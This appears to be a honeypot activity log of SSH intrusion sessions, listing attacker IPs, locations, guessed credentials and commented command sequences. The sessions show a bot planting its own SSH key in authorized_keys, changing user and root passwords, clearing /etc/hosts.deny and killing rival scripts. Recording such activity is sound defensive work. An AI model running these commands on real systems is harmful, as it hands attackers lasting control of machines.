$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "sharepoint\n4QKuegsnjbhf\n4QKuegsnjbhf"|passwd|bash
$ echo "sharepoint\n4QKuegsnjbhf\n4QKuegsnjbhf\n"|passwd
$ echo "root:jkTtGtvTUFMd"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 wok (111.228.58.144) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-06-10 05:09 EDT Β· as backend/backend
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "backend\nyOT6F9FDqa18\nyOT6F9FDqa18"|passwd|bash
$ Enter new UNIX password:
$ echo "backend\nyOT6F9FDqa18\nyOT6F9FDqa18\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 carnival_root_2 (201.16.238.49) β€” SΓ£o Paulo, Brazil Β· 5 sessions Β· 45 cmds
2026-05-23 06:34 EDT Β· as curl/welltech12, portugal/portugal, root/Pp123456!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "portugal\naQfWQV2CnuAJ\naQfWQV2CnuAJ"|passwd|bash
$ Enter new UNIX password:
$ echo "portugal\naQfWQV2CnuAJ\naQfWQV2CnuAJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:EAnX7DyO6MRk"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 beefeater_root_2 (217.154.42.110) β€” Worcester, United Kingdom Β· 1 session Β· 19 cmds
2026-06-10 04:14 EDT Β· as root/abcd123!@#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:rjaNbIOjiOuo"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 kimchi (119.203.251.187) β€” Daejeon, South Korea Β· 1 session Β· 20 cmds
2026-06-10 04:10 EDT Β· as portugal/portugal
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "portugal\nKipnObkADPIc\nKipnObkADPIc"|passwd|bash
$ Enter new UNIX password:
$ echo "portugal\nKipnObkADPIc\nKipnObkADPIc\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_pi (104.168.4.239) β€” Buffalo, United States Β· 1 session Β· 20 cmds
2026-06-10 04:05 EDT Β· as viruswall/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\neUFYhE8QW3x2\neUFYhE8QW3x2"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\neUFYhE8QW3x2\neUFYhE8QW3x2\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 fika_sol (91.92.42.227) β€” Stockholm, Sweden Β· 1 session Β· 1 cmd
2026-06-10 04:03 EDT Β· as admin/1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 fika_root (171.25.158.57) β€” Vaxjo, Sweden Β· 1 session Β· 20 cmds
2026-06-10 03:32 EDT Β· as client/client123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "client123\nEWD8dWyFpGsZ\nEWD8dWyFpGsZ"|passwd|bash
$ Enter new UNIX password:
$ echo "client123\nEWD8dWyFpGsZ\nEWD8dWyFpGsZ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle_sol (107.180.88.176) β€” Ashburn, United States Β· 2 sessions Β· 39 cmds
2026-05-18 10:12 EDT Β· as root/mark01, war/war
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "war\nSVCmgD7RZRUw\nSVCmgD7RZRUw"|passwd|bash
$ Enter new UNIX password:
$ echo "war\nSVCmgD7RZRUw\nSVCmgD7RZRUw\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:x2xX0zpB7haA"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 wraith_sol (31.7.66.163) β€” Tehran, Iran Β· 1 session Β· 20 cmds
2026-06-10 03:21 EDT Β· as war/war
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "war\ndIOQBneGj9Yp\ndIOQBneGj9Yp"|passwd|bash
$ Enter new UNIX password:
$ echo "war\ndIOQBneGj9Yp\ndIOQBneGj9Yp\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern (223.104.128.76) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-06-10 01:55 EDT Β· as swissmp/Swissmp123##
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_15 (103.86.198.253) β€” Gazipur, Bangladesh Β· 5 sessions Β· 99 cmds
2026-05-15 14:11 EDT Β· as ek/ek, ethan/123, mobile/mobile
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo -e "ek\nWZzBEaoq9kQ7\nWZzBEaoq9kQ7"|passwd|bash
$ Enter new UNIX password: Γ—4
$ echo "ek\nWZzBEaoq9kQ7\nWZzBEaoq9kQ7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo -e "taba\n1hLEyzvaMpGo\n1hLEyzvaMpGo"|passwd|bash
$ echo "taba\n1hLEyzvaMpGo\n1hLEyzvaMpGo\n"|passwd
$ echo -e "123\njzTAeC46FSNn\njzTAeC46FSNn"|passwd|bash
$ echo "123\njzTAeC46FSNn\njzTAeC46FSNn\n"|passwd
$ echo "root:sVjIRbnXQxcy"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "mobile\nyaVOYeVQjDO2\nyaVOYeVQjDO2"|passwd|bash
$ echo "mobile\nyaVOYeVQjDO2\nyaVOYeVQjDO2\n"|passwd
🎭 monsoon_root (135.13.28.35) β€” Chennai, India Β· 1 session Β· 20 cmds
2026-06-10 00:49 EDT Β· as ek/ek
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ek\nhWpH5OxMAOSQ\nhWpH5OxMAOSQ"|passwd|bash
$ Enter new UNIX password:
$ echo "ek\nhWpH5OxMAOSQ\nhWpH5OxMAOSQ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stroopwafel_sol (45.156.87.204) β€” Eygelshoven, Netherlands Β· 4 sessions Β· 4 cmds
2026-05-09 23:20 EDT Β· as hadoop/hadoop, rancher/rancher, root/root
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—4
🎭 wraith_root_6 (168.76.131.178) β€” Bloemfontein, South Africa Β· 2 sessions Β· 40 cmds
2026-05-09 05:04 EDT Β· as vsftp/123456, xyx/123456
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nhGh8NdK0s9Il\nhGh8NdK0s9Il"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\nhGh8NdK0s9Il\nhGh8NdK0s9Il\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123456\nAaJDWgk8vci8\nAaJDWgk8vci8"|passwd|bash
$ echo "123456\nAaJDWgk8vci8\nAaJDWgk8vci8\n"|passwd
🎭 specter_root_27 (185.226.89.235) β€” Tirana, Albania Β· 1 session Β· 20 cmds
2026-06-09 22:27 EDT Β· as sonia/123456
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nFc4vPrLFDLMU\nFc4vPrLFDLMU"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nFc4vPrLFDLMU\nFc4vPrLFDLMU\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 k-pop_root_6 (43.164.133.93) β€” Seoul, South Korea Β· 1 session Β· 20 cmds
2026-06-09 22:23 EDT Β· as xyx/123456
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nV57jRVyhD9ya\nV57jRVyhD9ya"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nV57jRVyhD9ya\nV57jRVyhD9ya\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_12 (182.93.50.90) β€” Zhuojiacun, Macao Β· 5 sessions Β· 100 cmds
2026-05-25 09:06 EDT Β· as rancher/rancher, teacher/teacher, ubuntu/1234qwer
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
